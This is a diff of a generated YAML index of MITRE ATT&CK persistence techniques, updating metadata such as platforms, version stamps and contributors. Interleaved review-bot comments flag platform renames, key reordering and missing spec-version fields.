- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32300,9 +32727,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32311,13 +32740,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
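Review bot: the T1136.003 platform list drops `Azure AD`, `Office 365` and `Google Workspace` in favor of `Office Suite` and `Identity Provider` (T1098 below gets the same change). Anything in the repository that filters techniques or names generated indexes by the old platform strings needs to be updated in the same change, otherwise those per-platform views silently lose these techniques.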
@@ -32365,14 +32794,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -32408,16 +32834,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32458,143 +32883,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
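Review bot: this 140-line hunk is almost entirely key reordering of T1547.006: the description, detection text, kill chain phases, data sources and the `url`/`external_id` order inside every external reference move position with identical content. The substantive changes hidden in it are the `modified` stamp, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the dropped `spec_version`, and the iDefense reference (http to https plus a new retrieval date). Either state in the PR description that the reorder is mechanical, or have the generator emit keys in the previous order so reviewers can see the real edits.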
@@ -32631,7 +33054,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -32657,12 +33080,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
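Review bot: T1574.013 loses `x_mitre_attack_spec_version` outright here (2.1.0 is removed with no replacement in this hunk), whereas the other techniques in this patch get it bumped to 3.2.0; please confirm it is re-added elsewhere in the object or that the upstream object genuinely lacks the field, since a consumer that reads it will now get a missing key for this one technique.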
@@ -32740,9 +33161,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -32769,7 +33189,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32791,41 +33211,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
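Review bot: T1542.004 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` at the top of this hunk with nothing put in their place, so unlike T1053.006 above (which now carries 3.2.0) this object ends up with no ATT&CK spec version at all; if the upstream object genuinely lacks the field, the generator should either emit a documented default or the key should be documented as optional. Separately, the T1137.003 block is removed here and re-added in the next hunk with only the `modified`, platform and version changes being substantive; emitting keys in a fixed order in the generator would keep future regenerations to a few changed lines instead of a 40-line move.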
@@ -32834,22 +33223,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
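Review bot: `x_mitre_permissions_required` (Administrator, User) disappears from T1137.003 in this hunk, which is a content change rather than a reorder; if anything in this repo filters or renders on that field it should be called out alongside the `Office 365` to `Office Suite` platform rename and the 1.1 to 1.2 version bump. The rename also matters for any per-platform index derived from `x_mitre_platforms`: an index keyed on the old `Office 365` name will no longer find this technique unless the platform mapping is updated in the same PR.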
@@ -32915,7 +33331,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -32989,11 +33404,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33010,7 +33424,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33020,7 +33433,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33029,19 +33442,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
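Review bot: T1078's platform list drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (version 2.6 to 2.7); if the per-platform indexes are built by matching these platform strings, the existing cloud-identity atomics attached to this technique will silently fall out of any index still keyed on the legacy names, so please update that mapping in the same change and confirm the generated per-platform files still list the T1078 tests.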
@@ -33089,11 +33500,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33122,24 +33534,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
